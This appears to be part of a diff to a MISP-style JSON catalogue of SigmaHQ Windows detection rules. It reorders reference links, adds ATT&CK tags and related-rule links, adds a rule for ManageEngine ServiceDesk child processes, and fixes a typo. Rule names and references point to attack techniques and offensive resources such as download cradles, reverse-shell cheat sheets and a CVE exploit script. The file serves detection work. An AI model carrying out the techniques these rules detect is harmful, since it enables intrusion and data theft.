"https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", "https://twitter.com/Z3Jpa29z/status/1317545798981324801", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", + "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_execution.yml" ], "tags": [ @@ -46265,8 +46854,20 @@ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.t1132.001" + ] }, + "related": [ + { + "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "value": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation" }, @@ -46350,9 +46951,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", + "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_koadic.yml" ], "tags": [ @@ -46434,8 +47035,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" ], "tags": [ @@ -46609,8 +47210,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml" ], "tags": [ @@ -46646,8 +47247,39 @@ "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_system_informer.yml" ], - "tags": "No established tags" + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.discovery", + "attack.defense_evasion", + "attack.t1082", + "attack.t1564", + "attack.t1543" + ] }, + "related": [ + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5722dff1-4bdd-4949-86ab-fbaf707e767a", "value": "PUA - System Informer Execution" }, @@ -46690,8 +47322,29 @@ "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.t1059.001", + "attack.t1105" + ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", "value": "PowerShell Web Download" }, @@ -46708,14 +47361,27 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://twitter.com/splinter_code/status/1483815103279603714", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1134.002" + ] }, + "related": [ + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", "value": "PUA - AdvancedRun Suspicious Execution" }, @@ -46732,9 +47398,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", "https://github.com/dsnezhkov/TruffleSnout", + "https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml" ], "tags": [ @@ -46768,8 +47434,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" ], "tags": [ @@ -46803,10 +47469,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", - "https://twitter.com/EricaZelic/status/1614075109827874817", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://twitter.com/EricaZelic/status/1614075109827874817", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml" ], "tags": [ @@ -46923,8 +47589,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", "https://twitter.com/pabraeken/status/999090532839313408", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", "https://twitter.com/pabraeken/status/995837734379032576", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml" ], @@ -47026,8 +47692,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" ], "tags": [ @@ -47084,8 +47750,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", + "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml" ], @@ -47120,8 +47786,8 @@ "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", - "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/", "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md", + "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml" ], "tags": [ @@ -47291,8 +47957,8 @@ "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/right-to-left-override/", - "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method", "https://unicode-explorer.com/c/202E", + "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml" ], "tags": [ @@ -47325,8 +47991,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml" ], @@ -47368,10 +48034,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", - "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", - "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", + "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", + "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", + "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml" ], "tags": [ @@ -47404,12 +48070,24 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml" ], - "tags": "No established tags" + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", "value": "Suspicious Redirection to Local Admin Share" }, @@ -47459,14 +48137,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ @@ -47508,8 +48186,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" ], @@ -47643,8 +48321,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/cmd.html", "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml" ], "tags": [ @@ -47677,8 +48355,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/nao_sec/status/1530196847679401984", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" ], "tags": [ @@ -47762,9 +48440,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml" ], "tags": [ @@ -47797,8 +48475,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml" ], "tags": [ @@ -47865,11 +48543,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Hexacorn/status/885553465417756673", - "https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", - "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques", "https://twitter.com/Hexacorn/status/885570278637678592", + "https://twitter.com/Hexacorn/status/885553465417756673", "https://twitter.com/vysecurity/status/885545634958385153", + "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques", + "https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml" ], "tags": [ @@ -48028,8 +48706,8 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ @@ -48208,8 +48886,20 @@ "https://twitter.com/ankit_anubhav/status/1518835408502620162", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_child_processes.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059.001" + ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", "value": "Potentially Suspicious PowerShell Child Processes" }, @@ -48258,8 +48948,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md", - "https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a", "https://securelist.com/locked-out/68960/", + "https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml" ], "tags": [ @@ -48279,6 +48969,41 @@ "uuid": "77df53a5-1d78-4f32-bc5a-0e7465bd8f41", "value": "Portable Gpg.EXE Execution" }, + { + "description": "Detects suspicious child processes of the \"Manage Engine ServiceDesk Plus\" Java web service", + "meta": { + "author": "Florian Roth (Nextron Systems)", + "creation_date": "2023/01/18", + "falsepositive": [ + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + ], + "filename": "proc_creation_win_java_manageengine_susp_child_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py", + "https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", + "https://blog.viettelcybersecurity.com/saml-show-stopper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102" + ] + }, + "related": [ + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "value": "Suspicious Child Process Of Manage Engine ServiceDesk" + }, { "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", "meta": { @@ -48315,7 +49040,7 @@ } ], "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "value": "New Port Forwarding Rule Added Via Netsh.EXX" + "value": "New Port Forwarding Rule Added Via Netsh.EXE" }, { "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script to run for a specific VM state", @@ -48330,8 +49055,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/", + "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml" ], "tags": [ @@ -48552,8 +49277,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml" ], "tags": [ @@ -48586,8 +49311,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://twitter.com/orange_8361/status/1518970259868626944", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml" ], "tags": [ @@ -48611,8 +49336,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ @@ -48757,9 +49482,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/defaultnamehere/cookie_crimes/", - "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", - "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", + "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", + "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml" ], "tags": [ @@ -48823,8 +49548,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", + "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml" ], "tags": [ @@ -48934,9 +49659,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode.yml" ], "tags": [ @@ -48969,8 +49694,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml" ], "tags": [ @@ -49003,8 +49728,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" ], "tags": [ @@ -49061,8 +49786,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/03/30/weak-service-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/30/weak-service-permissions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" ], "tags": [ @@ -49131,8 +49856,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml" ], "tags": [ @@ -49165,8 +49890,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/mandiant/SharPersist", "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", + "https://github.com/mandiant/SharPersist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml" ], "tags": [ @@ -49273,8 +49998,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/3proxy/3proxy", "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/3proxy/3proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml" ], "tags": [ @@ -49344,9 +50069,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.revshells.com/", "https://docs.python.org/3/using/cmdline.html#cmdoption-c", + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml" ], "tags": [ @@ -49505,8 +50230,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://nsudo.m2team.org/en-us/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://nsudo.m2team.org/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml" ], "tags": [ @@ -49590,15 +50315,15 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://blog.talosintelligence.com/2017/05/wannacry.html", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://github.com/Neo23x0/Raccine#the-process", - "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml" ], "tags": [ @@ -49640,8 +50365,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Turla has used fsutil fsinfo drives to list connected drives.", "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", + "Turla has used 